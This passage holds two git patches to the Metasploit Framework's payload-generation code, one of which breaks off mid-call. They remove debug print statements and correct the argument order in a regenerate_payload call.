1cf485fad13ff735bb44dc5f9c22dc32e592f58e Mon Sep 17 00:00:00 2001 From: sinn3r Date: Wed, 22 May 2013 12:06:36 -0500 Subject: [PATCH 5/6] Restore tcp.rb to its current state --- lib/msf/core/exploit/tcp.rb | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/lib/msf/core/exploit/tcp.rb b/lib/msf/core/exploit/tcp.rb index a34f195744..5a923427ec 100644 --- a/lib/msf/core/exploit/tcp.rb +++ b/lib/msf/core/exploit/tcp.rb @@ -468,8 +468,6 @@ module Exploit::Remote::TcpServer # def regenerate_payload(cli, arch = nil, platform = nil, target = nil) - $stderr.puts("Tcp##{__method__} : target: #{target.inspect}") - ohost = datastore['RHOST'] oport = datastore['RPORT'] p = nil @@ -479,7 +477,7 @@ module Exploit::Remote::TcpServer datastore['RHOST'] = cli.peerhost datastore['RPORT'] = cli.peerport - if ((p = super(platform, arch, target)) == nil) + if ((p = super(arch, platform, target)) == nil) print_error("Failed to generate payload") return nil end From 8483528ae0273bd8c2c2480d2b37ce1b2251464c Mon Sep 17 00:00:00 2001 From: sinn3r Date: Wed, 22 May 2013 12:11:06 -0500 Subject: [PATCH 6/6] Restore generic.rb to the correct state --- lib/msf/core/payload/generic.rb | 5 ----- 1 file changed, 5 deletions(-) diff --git a/lib/msf/core/payload/generic.rb b/lib/msf/core/payload/generic.rb index 4691c7ed59..c72cf13bf0 100644 --- a/lib/msf/core/payload/generic.rb +++ b/lib/msf/core/payload/generic.rb @@ -211,13 +211,10 @@ protected arch = nil if explicit_arch.nil? == false - $stderr.puts "explicit" arch = explicit_arch elsif datastore['ARCH'] - $stderr.puts "datastore" arch = datastore['ARCH'] elsif assoc_exploit - $stderr.puts "assoc_exploit" arch = assoc_exploit.target_arch || ARCH_X86 end @@ -236,8 +233,6 @@ protected # Look for one based on the exploit's compatible set if(assoc_exploit) - $stderr.puts "assoc_exploit #{assoc_exploit.name}" - $stderr.puts "#{actual_arch} #{actual_platform.inspect}" self.actual_payload = framework.payloads.find_payload_from_set( assoc_exploit.compatible_payloads, actual_platform,